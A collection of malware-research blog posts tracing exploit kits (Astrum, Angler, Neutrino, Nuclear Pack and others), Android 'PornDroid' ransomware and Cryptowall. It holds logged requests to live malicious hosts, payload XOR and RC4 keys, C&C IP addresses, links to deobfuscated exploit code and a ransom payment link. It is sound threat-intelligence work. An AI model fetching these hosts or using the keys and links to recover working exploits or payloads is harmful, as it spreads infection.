POST http://asset.yur88 .com/xcC2oZh5Lpbyq4bPox1Hq_uv3M-oGkXzoa_Vy_IaEvr4_IyZokFE_Lbmj5qmUA7-qg..

200 OK (text/html)

Astrum - 2014-09-06
Piece of the Post Call reply launching Silverligt and CVE-2013-2551 attack

The silverlight call, once decoded :

Astrum : Post reply silverlight call once decoded
2014-09-06
http://pastebin.com/enPjFN96

GET http://asset.yur88 .com/06RCA_viDC7kz3JtwIZlE-3LKG3LgWdLt8shaZGBMELumHg7wdpmRKCCeD_AyyxGvA..

200 OK (application/x-silverlight-app) 3b82c622a343317d14161206aa9f2fce

Silverlight Exploit

sl.dll : e332a8d62288b80f939fff7d50ac33d3

GET http://asset.yur88 .com/sKJTobP38yWHyWPPiJOaGI7NOc-DlJhA1M0wy9mUz0mNnmmZic-ZT8OEaZ2L3tNN3w..

200 OK (application/octet-stream) 9d9eb3ceffd6596ebdf7fc9387cd5cb1 Reveton again
Xor key : BFAD0475157E8E15F72903B5E80649B2

CVE-2013-2551 :

CVE-2013-2551 successfully fired by Astrum EK
2014-09-11

GET http://img.gestionartepyme .com.ar/omhq1t4pjx3fac.html
200 OK (text/html)

POST http://img.gestionartepyme .com.ar/C1BzyerkwKg1aE_30oT_kDU9S6TYgfyXZj0SqIGFqsUzbEzzgNv8w3h2SvLUzeDAZA..
200 OK (text/html)

After a first pass of decoding :

Piece of CVE-2013-2551 after first decoding pass.
http://pastebin.com/g847kaSX

GET http://img.gestionartepyme .com.ar/Wi-S--HJ20lkF67F2ankcWRCqpbTrOd2N0LzmoqosSRiE63Bi_bnIikJq87f4PshNQ..
200 OK (application/octet-stream) a668806b4be0e3b02e3adf0130b70bd0 once decoded (reveton)
Xor Key: 3FF52A9A6B4C3E3DE93AD7183C0DFFA6

Payload written in %temp%\tmp1.log

If lock screen is activated you'll get for instance in the us :

Reveton - Screen locked - 2014-09-11 US.

CVE-2014-0322 :

For some reason I couldn't get that one working properly.

CVE-2014-0322 fired by Astrum
But unsuccessful.

I'll update if i get a successful pass.

GET http://img.gestionartepyme .com.ar/zy6qjw78b3f4vus.html
200 OK (text/html)

Posted data after the landing, whispering the server to try
CVE-2014-0322 - (md5 is different)

POST http://img.gestionartepyme .com.ar/Nly0S9lDj4daNYQm6nfh71U1jCjjc-buCzLSc-Uht-8IbI935Hm07UV6jXDnaq_vWQ..
200 OK (text/html)

Obfuscated piece of code to trigger CVE-2014-0322
Astrum 2014-09-11

I won't put the decoded one ;)

Piece of the B64 encoded shellcode

CVE-2010-0188 :

Astrum firing CVE-2010-0188 (and Flash exploit also)
2014-09-11

GET http://assets.dance .com.ar/oljm3dz7pnh.html
200 OK (text/html)

Decoded posted data

POST http://assets.dance .com.ar/ZQc75hcLl-kOZATbKD-u1VpjA4kiO6-GDjgG2itsr4ZcOgeMKzOohBYhAt0pIreBCg..
200 OK (text/html)

Encoded part of the Post reply in charge of the call for CVE-2010-0188
Astrum - 2014-09-11

Once decoded :

Iframe called for CVE-2010-0188

GET http://assets.dance .com.ar/FCNKh1wkpvl_QHW6YxCfxStHcuhpFJ6Wfxx3u2BDnpYtHnbtYByZlGcFcLtiDYaRew..
200 OK (text/html)

Obfuscated : creation of the PDF object

Decoded:

Deobfuscated call for PDF

GET http://assets.dance .com.ar/4RkrZSI07MGKehRYHQDV_d59EwoXBNSuiiYWWR5T1K7YJBcPHgzTrJI_ElAfHcypjg..200 OK (application/x-shockwave-flash) (CVE-2013-0634/2014-0515)

GET http://assets.dance .com.ar/DQT9jPZKYcJmZ8KxyX5Y_jJgxePDelmtZjvAsMotWa00OcHmynJer34ix7DJY0GqYg..
200 OK (application/pdf) CVE-2010-0188 a3aa7a4499e7b89768ee82ea5c3c8b4a

We have the same kind of obfuscation here that in the landing and post response.

Object in the PDF containing the Encoded data

Piece of js in charge of deobuscating and triggering the exploit

GET http://assets.dance .com.ar/jnK3hV3Yt6HlEYi4YuyOnbEWj-po6I_O5U2KuWG_j863T4vvYeCIzP1UjrBv8ZfJ4Q..
200 OK (application/octet-stream)

GET http://assets.dance .com.ar/DqVkvx0HOxZlxluCIjMCKjHBXNAoNwN5ZZpZgyFgA3k3mFjVIT8Ee32DXoMhLht-YQ..
200 OK (application/octet-stream) Decoded : 154a5d50ee032dc32e4c64ecbde0eaa1 Reveton

Note that both payload (flash and PDF) in that pass have same Xor key ( 919DCE47A3DBD2518B2F1088604AE0DA )

No Java ?

This exploit kit had some java few weeks ago (CVE-2012-0507, CVE-2013-2460, CVE-2013-2465 - if you make a search on this IP in your log you might figure it ) but it seems java is not exploited anymore.
As I assumed for Flash EK, it's a trade of a now small percentage of infection for more stealth ( >> infection chain last longer >> less rebuild).

The exploitation Graph should be something like :

Astrum EK - Exploitation graph assumption

2014-09-14

Files :

AstrumEK_2014-09-14.zip (Owncloud)

AstrumEK 4 pcap (Owncloud) thanks to Fiddler2Pcap written by Will Metcalf (Emerging Threats)

PS: If you have some telemetry on this IP : 107.150.24.107 I would be really interested in the numbers. Seeing the infection path, I think traffic should be quite big.

↧

CVE-2013-7331 and Exploit Kits

October 2, 2014, 4:10 am

≫ Next: CVE-2014-0556 (Adobe Flash Player) integrating Exploit Kits

≪ Previous: Say Hello to Astrum EK

Thanks to EKWatcher and his decoding skills saving me a lot of time.

As we can see more and more of those "XMLDOM" checks in exploit kits i decided to write here some of the checks spotted. This is a fast moving area and it will be hard to keep up to date with this, but this may give an idea of how it's being used.

Angler EK:

http://pastebin.com/EAKZk43e 2014-10-01

Previously :
http://pastebin.com/pzx2xPDJ 2014-08-23

Astrum EK :

http://pastebin.com/PfAjuvPR 2014-09-06

Nuclear Pack :

Gathering samples by browsing requires hardening too. Nuclear Pack tries to detect VMWare now. pic.twitter.com/W9Z1bgUJyv
— kafeine (@kafeine) September 28, 2014

Read more:
Attackers abusing Internet Explorer to enumerate software and detect security products - Jaime Blasco - AlienVault - 2014-07-25

↧

CVE-2014-0556 (Adobe Flash Player) integrating Exploit Kits

October 20, 2014, 1:35 am

≫ Next: CVE-2014-0569 (Flash Player) integrating Exploit Kit

≪ Previous: CVE-2013-7331 and Exploit Kits

A proof of concept (for Flash 14.0.0.145) of a heap-based buffer overflow patched on September 9th, affecting Flash 13.0.0.<244, 14.0.0.<=179 15.0.0.<152 was published on September 30th on Packet Storm . Code targeting that CVE is now in Nuclear Pack.

Nuclear Pack :

Spotted on the 2014-10-19 but i thought illustrating it with a top500 worldwide website (owner will explain that it has been abused again...strange timing no ?) would better set things in perspective.

<edit>
For people thinking i "forgot" to credit Threat Glass for the referer...take a look at the vote timestamp on the payload ;)
</edit>

Beeg .com leading to Nuclear Pack and Cryptowall
Successul CVE-2014-0556 pass in Nuclear Pack 2014-10-20

GET http://axxesopri .ml/305d439amjgij.html
200 OK (text/html) d0806f81d4aaada74228ac352b463c05

Here another fresh Nuclear Pack landing after first deobfuscation pass :
http://pastebin.com/8U1rPbF7

CVE-2014-0556 related piece of Code in Nuclear Pack

GET http://axxesopri .ml/e109e3265b7emjgij/1413764940
200 OK (application/octet-stream) 23efdf5481fcd364559b0949a25c747d CVE-2014-0556 - Confirmation by @TimoHirvonen

GET http://axxesopri .ml/e109e326mjgij/1413764940/7
200 OK (application/octet-stream) d0806f81d4aaada74228ac352b463c05 - Cryptowall

--------------------------------

[Public Mail Reply]
How can I manage the updates for free and in a reliable way ?
You can consider using opensource tools like wpkg to spread the update. Ocs Inventory NG to ensure that the update campaign has been totally successful (and track the glitches).
In a multi-site environment a well thought DFS installation may help pushing the wpkg/update package on all remote sites. Then new flash/java/reader updates can be handled in few minutes (comments welcome)

Files: A pointless : Nothing yet.

Read more:
Exploiting CVE-2014-0556 in Flash - 2014-09-23 - Chris Evans - Project Zero
Adobe Flash 14.0.0.145 copyPixelsToByteArray() Heap Overflow - 2014-09-30 - Packet Storm

↧

CVE-2014-0569 (Flash Player) integrating Exploit Kit

October 21, 2014, 2:28 am

≫ Next: The worst of Windows "Police Locker" is also available on Android

≪ Previous: CVE-2014-0556 (Adobe Flash Player) integrating Exploit Kits

<this post has been edited multiple time to fix some error, bring some new elements. may still be changed >

My goal was to grab CVE-2014-0556 when i landed yesterday on Fiesta but according to @TimoHirvonen it's CVE-2014-0569 fixed only 1 week ago that has been fired here. It's a really fast integration in Exploit Kit. I've been told it landed in Fiesta after its coder reversed the patch (in 2 days).

So you know what to do : Ensure Flash Player is up to date (15.0.0.189 - for IE10/IE11 user the patch to check is : KB3001237 )

Fiesta :

CVE-2014-0569 successfull pass in Fiesta EK
2014-10-21
Fiesta Logo Courtesy of FoxIT.

GET http://rvdcgyisqy.myftp .org/jjcv7antdqqollz6mqusrbwjcu3z1835zzuurupwvyxdsy
200 OK (text/html)

"Relevant section from Fiesta landing page : http://pastebin.com/K4gbQWpS" By Jason in comments

GET http://rvdcgyisqy.myftp .org/cp9ne2q/4f25f1a50659fee801500b0e540a50040053040e5253510e0152060357535850;150000;144
200 OK (application/x-shockwave-flash) 254690dd89055c46f1a60713dbc26965 CVE-2014-0569

GET http://rvdcgyisqy.myftp .org/cp9ne2q/55cd3f2a4a3ae27c5645085f015d03500100555f0704025a0001575202040b04;7
200 OK (application/octet-stream) 2b74a966466d612b069161b4fdd0f775 Payload : Ropest (thx @Horgh_rce )

GET http://rvdcgyisqy.myftp

.org/cp9ne2q/55cd3f2a4a3ae27c5645085f015d03500100555f0704025a0001575202040b04;7;1
200 OK (text/html)

Files : Nothing Yet.

Fiddler sent to VT here : 9bb6292633f4eccd54aeb23ad3555507

Angler EK :

[Edit 2014-10-22 : It appears this could be another CVE (0558 or 0564 or something else killed by the last update) than CVE-2014-0569 - Am asking for help in figuring out]

CVE-2014-0569 (?) fired by Angler EK - 2014-10-21
Followed by Bedep activity and a Zeus Variant

GET http://three.creziontyro .in/qsx0jugfgk
200 OK (text/html) After first pass of deobfuscation http://pastebin.com/tnRKArFz (thx as always to @EKWatcher ) Update coming later maybe.

GET http://three.creziontyro .in/J-XQctybYriag-bOGIcSDh-HchIdpmXKk_M52H6bO6Y7NsJMsSIWWvNTG-R0tdBR
200 OK (application/x-shockwave-flash)d54a6cca8b6b52f6ed47769ba6397444 CVE-2014-xxxx

GET http://three.creziontyro .in/KxYioLx6A_QJguVdGPUpkrc6lJWbIWICBCyS8LR7X3pDLnTugBkW7GVC1vXjAtFj
200 OK (application/octet-stream) Stream containing Shellcode and Bedep.

Target Payload : 831098a9d8db43bebf3d6ee67914888d Kins Variant (Thanks to @maciekkotowicz who wrote about it on Kernelmode)

Files: Nothing Yet.

Fiddler sent to VT here : 6c0cd2dae5c43f92d86411977bb28b08

Astrum EK:

So Astrum is owning Flash 15.0.0.152. It seems the same undefined CVE (fixed 10 days ago by the last Flash Player patch ) in Angler EK is being used here as well.

Astrum EK exploiting Flash 15.0.0.152 to push Miuref AdFraud
2014-10-24

(Once again...Sorry I do not have enough time yet to study this in details)

GET http://b.kok44 .com/qtzscn6d2vyrp.html
200 OK (text/html)

POST http://b.kok44 .com/nlPPOoTJIWP0MPcC66tPW6E881Kxrk4JpG3zUe7-T16vY_BTuvYfUu118wO64AEI8g..
404 Not Found (text/html)

GET http://b.kok44 .com/qtzscn6d2vyrp.html
200 OK (text/html)

POST http://b.kok44 .com/YYclWjoL_Ppe6BRhUmbCkQ7uSWFZaMeRW-0UZ1I9lZYMvEtmAjeXkRKhGWMEItyRDQ..
200 OK (text/html)

GET http://b.kok44 .com/iajJ15EwZW62x_js-V1bBebBpezyU14Fs8L46vkGDALkk6frqQwOBfqO9eysGUUF5Q..
200 OK (application/x-shockwave-flash) 99a8b37fcd995f859e2b7e22ce8fe72b CVE-2014-05xx ??

GET http://b.kok44 .com/pYU3o8dIJ8ma6gaYryUZosrsW5ikKxyin-8Gnq9-TqXIvlmf_3RMotajC5j1YQeiyQ.. After deobfuscation ; 3ef89107362630d2ad56e7bef5a717fc Miuref AdFraud (cf form. Partnerka.me)
200 OK (application/octet-stream)

Files: Nothing Yet.

Fiddler sent to VT here : 5e9abc8ef40bb98afb00e40f12958919

Sweet Orange :

@kafeine Sweet Orange EK also uses the CVE-2014-0569.
— Simon Choi (@issuemakerslab) October 28, 2014

A pass with Firefox and flash 15.0.0.152 seems to confirm that. CVE-2014-0569 confirmed by Kaspersky. Simon Choi told me he also got a successful pass with IE 11 / flash 15.0.0.167 on Windows 8.

GET http://pirat.svanager.wielun .pl:8080/elements/film.php?london=274412&desktop=209908&advocacy=17&bloggers=22666&free=56481&articles=178642&other=287691
200 OK (text/html)

GET http://pirat.svanager.wielun .pl:8080/elements/xrbolXSHx
200 OK (application/x-shockwave-flash) 6d5591ef4d3ddb1c0b47d52a58e36036

GET http://pirat.svanager.wielun.pl:8080/backup.php?lang=1341&topics=12&voip=505&myguest=1251&math=1377&down=2386&game=2511
200 OK (application/octet-stream) Kovter bc8e0c39cc66da9c2caee65bd3a70882

Files: Soon. After Nuclear Pack integration.

Flash EK :

CVE-2014-0569 fired by a "full" Flash EK on 2014-10-28

GET http://tinsinarbetrab .eu/xs3884y132186/index.php
200 OK (text/html)

GET http://tinsinarbetrab .eu/xs3884y132186/js/swfobject.js
200 OK (application/javascript)

GET http://tinsinarbetrab .eu/xs3884y132186/banner.swf
200 OK (application/x-shockwave-flash) Filtering advert 8124c71afe59779e181c52857f990103

POST http://tinsinarbetrab .eu/xs3884y132186/gate.php
200 OK (text/html)

GET http://tinsinarbetrab .eu/xs3884y132186/Main.swf
200 OK (application/x-shockwave-flash)93bd68ff7112244d19030d360e9b2108 CVE-2014-0569 identified by Timo Hirvonen

GET http://tinsinarbetrab .eu/xs3884y132186/lofla1.php
200 OK (application/octet-stream) Necurs 96f0f62f798987fb0dd3427182775ef7

Files: Soon.

↧

The worst of Windows "Police Locker" is also available on Android

October 28, 2014, 12:08 pm

≫ Next: CVE-2014-8440 (Flash up to 15.0.0.189) and Exploit Kits

≪ Previous: CVE-2014-0569 (Flash Player) integrating Exploit Kit

Sad Danbo
Author: Erik mit k

One year ago, I blogged about a nasty evolution of Kovter using sick method to ensure people are shocked and in doubt enough to pay ransom.

A week ago doing some Android browsing to check how would react some "Desktop world" badness on mobile I've been pushed a pseudo Porn application

Usual referer for some Reveton Angler EK Thread tested on Android

pushes an APK after plugrush mobile badvert

So without user interaction nothing will happen. Just a dirty apk on your phone.
Now if you decide to install what pretends to be Porndroid :

Note the "Read your Web bookmarks and History"
and some unknown to me till now Permissions :
"Reorder Running Apps", "Draw Over Other apps"

Then if you launch it you are asked to grant it "Device Administrator" Rights

Fake "PornDroid" trying to convince you that it needs "Device Administrator"

If you activate it here is what will be shown in the Settings :

"These privileges are needed to protect your device from
attackers, and will prevent Android OS from heing destroyed.

In background a webpage containing Child Pornography is shown.

All images are linked to Videos that are indeed on the Server.

Captured Traffic between Launch and Lock

Then the phone is locked.

500$

You can expand each Block and get details

Usual Money Pack payment system

Can take photos

Image that have been pushed to the user are now
shown as "evidences". Browsing History available here too

This screen for the upper part
4 CP/Zoo images are presented as evidences

I was wondering if the images were taken from the cache or something but they are in fact downloaded encrypted with the Design in the first 400ko call (so even before the website is displayed).

What's missing ? oh yes...Prism.

I didn't analyse the APK deeply but the first http post is really big.

I wouldn't be surprised if Contacts/Browsing History etc were pushed to the C&C.

From what i saw this is Focused on USA.
Launching the APK from another country, you get the sick webpage, call to C&C but no lock.
Browsing the same referer from France and Great-Britain at that time i landed on some fake (?) antivirus stuff like :

Files: Nothing. But here is a md5 : be4ad7e9140646a31099780c62a34bca from when i discovered it. And a fresher one : c03e2d5712cb5d738f06bfd79b9be12a

It seems the main name coming is Koler...but i wouldn't say it's the same team behind this and the Koler featured here before and in last AdaptiveMobile post .

↧

CVE-2014-8440 (Flash up to 15.0.0.189) and Exploit Kits

November 20, 2014, 4:07 am

≫ Next: Neutrino : The come back ! (or Job314 the Alter EK)

≪ Previous: The worst of Windows "Police Locker" is also available on Android

Once again that's fast. Nine day (or less?) after patch

the vulnerability is being exploited in blind mass attack. No doubt about it : the team behind Angler is really good at what it does.

Angler EK :

Thanks to Kaspersky for CVE identification.

CVE-2014-8440 successfully exploited by Angler EK
2014-11-20

I won't go in details.
The Sample is : 8181b7da3a53a7a6c1d23f852e85c446
Two Fiddler (Firefox and IE) pushed on VT : Fiddler_Angler_CVE-2014-8440_Password_is_malware.zip

[Edit : 2014-11-26]
This CVE that was used only in a specific (VIP?) Angler instance has been propagated to all Angler EK threads with 02d48a05c15f55a085be296ed12a5ed7 this afternoon.

↧

Neutrino : The come back ! (or Job314 the Alter EK)

November 20, 2014, 4:53 pm

≫ Next: CVE-2014-6332 (Internet Explorer) and Exploits Kits

≪ Previous: CVE-2014-8440 (Flash up to 15.0.0.189) and Exploit Kits

Disclaimer: Once again I won't go in deep analysis of the EK in that post.
It's more a connecting the dots one.
Big thanks: Timo Hirvonen, @Malc0de , @EKWatcher, @node5 for all the help on this.

In September a post from Alter appeared on underground. He was searching for traffic to test an exploit kit he was building.

-----------------------
Всем привет.
Ищем человека с большим и стабильным потоком трафа со своего лома.
Трафик нужен для отладки и тонкой настройки работы связки.
Что конкретно требуется:
Скорость слива 1к хостов 3-5 минут.
Доступ в ТДС или любую другую панельку где я мог бы сам включать или выключать траф на тестовый поток связки в любое удобное для меня время.
ТДС должна поддерживать работу с API автозабора.

Со своей стороны:
Месяц на выделенном сервере бесплатно
Последующая аренда по льготным условиям

Приватное решение с ограниченным набором.
Будем рады серьезному человеку с репой.
Контакт PM.
-------------------------

Google Translated as :

-------------------------
Hello.
Looking for a man with a large and stable flow of cores from your scrap.
Traffic needed for debugging and fine-tuning of the bunch.
What exactly is required:
Speed plum 1k hosts 3-5 minutes.
Access TDS or any other socket where I could turn on or off myself to the test stream traf ligament at any convenient time for me.
RTD should support the work with the API avtozabora.

For its part:
Month for a dedicated server for free
Leaseback on preferential terms

Private decision with a limited set.
We will be glad serious man with a turnip.
Contact PM.
--------------------------

On the 26th of september I spotted something that was a really good candidate for an "Alter EK".

Alter EK candidate - 2014-09-26

Many things were pointing to Alter EK :
- The chronology (we do not see new pattern really often)
- The payload was contacting back the EK
and other hints (traffic filtering upfront) were confirming a "Training Range".

Talking with Will Metcalf from Emerging Threats we decided to name that Exploit Kit : Job314 (cf Knock part).

Some new tricks there. The java calls were embedded in the Flash.
Same for the CVE-2013-2551 (IE) embedded inside flash.

We saw the evolution all the following weeks.

Job314 - Test Thread - 2014-10-20

A week ago Alter published a new advert :

----------------------
Приватная связка с высоким пробивом и стабильной чистотой.
Месяц аренды от $3000
Аренда только на выделенных сервера.
Домены и фронты в стоимость аренды не входят.
Информация по составу эксплоитов не предоставляется.

Возможен тест на день 100$ (50к хостов).
Гарант только с данного борда и за ваш счет.

Jabber: s@userjab.com

-----------------------

Google Translated as :

-----------------------

Privacy punching a bunch of high purity and stable.

Month lease at $ 3000

Rent only on dedicated servers.

Domains and fronts in the rental price are not included.

Information on the composition of exploits is not available.

Possible test day $ 100 (50k hosts).

Guarantee only with this Bordeaux and at your expense.

Jabber: s@userjab.com

-------------------------

The big surprise was in the Screenshot :

Alter EK screenshots - Neutrino !

So after disappearing around the 17th of March, Neutrino is back !

Rebuilt from Scratch it seems and what we called Job314 is this Neutrino "2".

Today checking a distribution path usually redirecting to Flash EK (Necurs in /sv62a76d18537/ )

Distribution Path to Necurs via "script" redirector and Flash EK
2014-11-15

then few days of Angler EK with Necurs pushed in Bedep I landed on :

Neutrino Pushing Necurs
2014-11-20 (and drops callbacks)

Let's take a look at this

Neutrino Pass:

Neutrino - 4 CVE in 1 Flash

GET http://amtudatqfi.border2 .xyz:47130/establish/40006/disguise/67531/harmony/25804/duke/grunt/north/5261/cart/51566/peter/shove/solitary/labour/squat/glad/
200 OK (text/html)

Neutrino Landing - 2014-11-20
http://pastebin.com/ssgay7Zn
Straight to the flash

Unescaping the B64 blob and applying the RC4 key we can find in the flash

RC4 : lrnfsvobuudc

We get :

Path fired for each exploit
note the payload Key: uzxceruvsl

the different URI for the different Exploit.

GET http://ajax.googleapis.com/ajax/libs/swfobject/2.2/swfobject.js
200 OK (text/javascript)

GET http://amtudatqfi.border2 .xyz:47130/dark/9844/watch/5350/slip/64080/explanation/41483/mend/93598/collapse/39865/model/25005/
200 OK (text/html) Flash containing at least CVE-2014-6332, CVE-2013-2551, CVE-2014-0515, CVE-2014-0569 7a5f2d7efe55020e65dcdd77bcdf853e

The four Rc4ed Exploits embedded in the single flash
Neutrino 2014-11-21

GET http://wyuye.border2 .xyz:38779/false/hood/broom/9264/lover/22172/permit/45653/madam/44441/downstairs/grand/military/measure/themself/65550/
200 OK (application/octet-stream) RC4 (Key : uzxceruvsl ) encoded Necurs f185111b2b0c61b26f2cdae1fee81031

Note : User-Agent: Mozilla

Based on what we saw earlier we can say that it's CVE-2014-6332 who owned that VM.

GET http://wyuye.border2 .xyz:38779/sweet.pl?whistle=word&more=start&wick=pressure&gasp=warm&join=victim&proper=52499&camera=44137&overhead=19904
404 Not Found (text/html)< CVE-2014-0569 calls. 404ed maybe because of the 200 OK on previous call.

File: That flash is well thought and seems easy to reuse, I will hold on this.
Fiddler pushed to VT here.
2014-11-24 - SWF : 19a6ef1cf490aec30018d95a4f07f42a
Let's finish with one advice from Will Metcalf (Emerging Threats) :

If u are a snort/suri user using snort < 2.9.7 or suricata w/o lua to decompress and inspect flash now is the time. https://t.co/Sh8Kq1TA46
— William Metcalf (@node5) November 20, 2014

↧

CVE-2014-6332 (Internet Explorer) and Exploits Kits

November 21, 2014, 12:24 pm

≫ Next: Call me Null Hole maybe ?

≪ Previous: Neutrino : The come back ! (or Job314 the Alter EK)

For this CVE referer to :
http://technet.microsoft.com/security/bulletin/MS14-064

The first encounter I had with this CVE in exploit kit, was in the Sweet Orange from the actor pushing DarkShell via KR compromised website. The landing provided by @MalwareSigs the 2014-11-19 was already containing CVE-2014-6332

So this actor :

DarkShell pushed by ~~Da Gong~~ CK VIP (cf comments) via CVE-2014-0515
2014-09-28

that we saw moving to Sweet Orange :

The actor pushing DarkShell with GongDa via KR compromised websites has migrated to Sweet Orange.Somewhat unexpected. pic.twitter.com/rlMy5RsevJ
— kafeine (@kafeine) October 25, 2014

Sweet Orange :

The URL pattern are different, but at a given time the modifications are similar on both...

Da Orangade firing CVE-2014-6332 and DarkShell Call back
2014-11-19

GET http://98.126.249 .92:82/index.html
200 OK (text/html)

Sweet Orange Landing
2014-11-19

A replace then a b64decode on the second b64 blob and we have :

CVE-2014-6332 in Sweet Orange
2014-11-19

GET http://v.krtedun .com/sum.exe - DarkShell - fc1a3c9fc7a80e80109f1e2a32e2b057

200 OK (application/octet-stream)

Here a more "standard" Sweet Orange :

CVE-2014-6332 fired by Sweet Orange - And Betabot call back.
2014-11-21

File : You'll find a PCAP illustrating this here

http://www.threatglass.com/serve_pcap/498fe35b94145153f51c51f66abe42af/20141121 from

http://www.threatglass.com/malicious_urls/volumebass-com-2014-11-21 (in this pcap the CVE-2014-6332 is in the first b64 blob)

Neutrino :

Neutrino Firing CVE-2014-6332 embedded in a flash
2014-11-20

Please refer to this post : Neutrino : The come back !

Archie :

First spotted by Will Metcalf, here CVE-2014-6332 in Archie

CVE-2014-6332 - 2014-11-24

Decoded b64 here http://pastebin.com/EhpdrZvy
Fiddler here

Read More :

Neutrino : The come back ! - 2014-11-20

IBM X-Force Researcher Finds Significant Vulnerability in Microsoft Windows - 2014-11-11

http://technet.microsoft.com/security/bulletin/MS14-064

↧

Call me Null Hole maybe ?

November 23, 2014, 10:32 am

≫ Next: Critroni += NL and IT

≪ Previous: CVE-2014-6332 (Internet Explorer) and Exploits Kits

Disclaimer : I won't study this one in details. The global logic should not be far from The Styxy Cool or Styx itself. Once again just a "connecting some dots" post.

Since many months what i was mentally naming "Weird Styx" that was really similar to Kein/Styx Kein puzzled me.

2013-01-22 - "a Weird Styx"

This was as Styxy as an exploit kit can be...but not as randomized as Styx was.
Exploits were rotating really slowly as in Kein.

I would not be surprised if the coder of the exploits/scheme of Styx, Styxy Cool, Kein and Null Hole is the same.

Null Hole - Login Page

Null Hole - 1 API Call (Used for instance by TDS to get the actual landing)

Null Hole - Raw Stats on one Thread

Null Hole - Partner management

Null Hole. A bunch of Sploits.

Null Hole - Manage Clone (vhosts/proxies)

You remember the Signed Cryptowall that got some attention a month ago ?

It was pushed in Both Nuclear Pack and Null Hole.

This is the Null Hole thread :

Null Hole 2014-09-29

The number of Victims of that thread : 770.

{"objects":[{"blocked":9963,"loads":770,"raw":47506,"stream_id":"9","unique":20584,"withdrawn":0}]}

This Exploit Kit seems to be blinking. Used few weeks...disappear a month or two.

Here is a fresh pass (Thanks to : @robemtnez )

Null Hole - 2014-11-17
Here: Firing CVE-2014-0515 - 2014-0569 (Thx TimoHirvonen)
CVE-2013-2551

2014/11/17 20:18:09;camping.ycw94.com;80;198.50.27.162

Files :
You'll find a Pcap from Brad here.

↧

Critroni += NL and IT

December 28, 2014, 6:42 am

≫ Next: Inside Android LockOut System aka PornDroid

≪ Previous: Call me Null Hole maybe ?

CTB Locker += NL & IT

Studying the Revslider infection schemes I get redirected on the "Revslider Case 3" (cf Sucuri Blog post) to Nuclear Pack

Revslider Case 3 - Path to Nuclear Pack delivering Critroni
2014-12-28

Decoded Payload : 10f0eaa794f48ad0b15034e0683cb15f

It's CTB Locker aka Critroni.

What is new to me here is the random encrypted file extension :

Encoded RTF with unique extension

Files dropped in MyDocuments
(background wallpaper and decryption explanation)

And the integration of two Languages : NL and IT

Critroni - First Screen NL
2014-12-28

Critroni - First Screen IT
2014-12-28

Critroni - Test Explanation - NL
2014-12-28

Critroni - Test Explanation - IT
2014-12-28

Critroni - Decryption Test - NL
2014-12-28

Bitcoin Address Screen - NL
1AjhFhf7rE2V3sKmTxoK7t6M7aaymTrt5G

BTC explanation - NL
2014-12-28

Files: Critroni_NL_IT.zip (Fiddler and payload)

↧

Inside Android LockOut System aka PornDroid

January 10, 2015, 11:26 am

≫ Next: Guess who's back again ? Cryptowall 3.0

≪ Previous: Critroni += NL and IT

When i wrote "The worst of Windows "Police Locker" is also available on Android" I thought this was a "rare" threat and was not really likely to achieve its goal.

I was wrong.

It did not take long for "Porndroid" to become the first keyword for incoming traffic to this blog.
So I thought that "Porndroid" was maybe associated to legit pornography on Android...but no...so I understood that this ransomware was probably more spread than expected.

And indeed...I found a TDS that is pushing around 500k visitors a day to fake porn website designed for Mobile with fast rotating domains and path (to play the "PokeAMole" with defense and avoid replay)

TDS redirecting to Porndroid Ransomware
Traffic between 2014-19 and 24
This TDS is still live and kicking

Traffic is coming from ExoClick, EroAdvertising, Plugrush etc...so mostly badvert.

Since my last post an additionnal step was added :

Advices on how to install the PornDroid "Video Player" or
How to get SocEng and Ransomed

But it seems that in the last move (this week) they switched to a Browlock style landing prompting repeatedly to install the downloaded "video player"

Piece of code of last version of the PornDroid Landing

Alert now shown by the Landing

The ransomware is not grabbing the fake page via external call anymore. Content is embedded in the APK which explain why it's "meaty": 1Mo.

Permissions changed a little

+ Find Accounts on the Device
+ modify the contents of the SD card
- Read your Text message
- Read Bookmark and History

Identical to previous post

The explanation for "Administrator Rights" prompt has been tuned to:

XXX Video (PornDroid) prompting for Administrator Rights. Reason ?
"Set Storage Encryption"

If you accept the malware is launched immediately.

Screen lock after click on any video is the same :

PornDroid - LockScreen

Same "proof" of illegal activity :

etc.. (see this post for more screens of the ransomware itself)
Many server were/are acting as C&C for this mobile Ransomware.

Here are some :

217.12.221.236
192.240.96.236
apimapu.net ( 64.187.225.228 )
apimapq.net ( 37.1.213.175 )
107.181.174.23
192.240.96.254
50.7.71.99
64.187.225.228

Admin entrance is like :

Android LockOut System - Admin Login Page

Here is one panel :

PornDroid/LockOut System Panel - Main

And another one :

One more

I won't add more "Main" Screenshots as those three are representatives.

The following screenshots comes from different panels, different times...don't try to "connect" them together.

Android LockOut System - Stats per day

Android LockOut System - All bots
4-5 infections per minute when taken

Android LockOut System - All Codes

Other valid Replies :

Moneypack Replies

Commands

Gathered Accounts

Android LockOut System - Sent Command

Android LockOut System - Domains

Big figure :

Target : Mosly US

Cumulative number of infection in december : between 180k and 240k

(why no-one is talking about that if it's "that" widespread ? It's about : Shame. If you see the "proof" tab you understand )

Average number of devices locked daily : 7k

Percentage of people paying : between 0.4 and 1%

Money : at least half a million $ in voucher in December (note: $ in voucher is not $ in pocket for operators)

It seems server are changed every 30-40k infections.

Not all the data is shared here (missing: main actor Nickname, adverts,domains,screenshots). So feel free to contact me if you are a researcher or want to act on it. (do with pro email - no gmail/yahoo/mail.ru etc. accounts...)
---
Thanks to @Malwageddon for some translation hints.

Files:
4 samples in a Zip sent on VT

Read More :
The worst of Windows "Police Locker" is also available on Android 2014-10-28

Extra:
For those who did not see it, Idan Revivo and Ofer Caspi from Checkpoint shared on GitHub "A Cuckoo Sandbox Extension for Android". Thanks !!

Porndroid in Cuckoo Sandbox extension for Android
(you can get better than what is shown here. basic install)

↧

Guess who's back again ? Cryptowall 3.0

January 13, 2015, 2:37 pm

≫ Next: CVE-2014-9162 (Flash 15.0.0.242 and below) integrating Exploit Kits

≪ Previous: Inside Android LockOut System aka PornDroid

Help_Decrypt.html Title

Thanks : @Horgh_RCE for all the reversing work

Exactly one month since last Cryptowall binary. Can we say goodbye ?
— kafeine (@kafeine) December 18, 2014

(If i am wrong that last itw Cryptowall 2.0 sample is from 2014-11-18 please contact me. I'd be happy to fix)

And almost two months after last sample....the reply is sadly no.

Today :

Magnitude : 2015-01-13
One payload only (which does not happen that often)

And here is what i saw in the Network quarantine (and later everywhere it could find files to encrypt)

Cryptowall - French instructions.
3.0

Here in English from another infection (Note: you'll get the png image with translation that fit your geoloc IP).

One bunch of Links :
http://paytoc4gtpn5czl2.torforall.com/1c3L59z
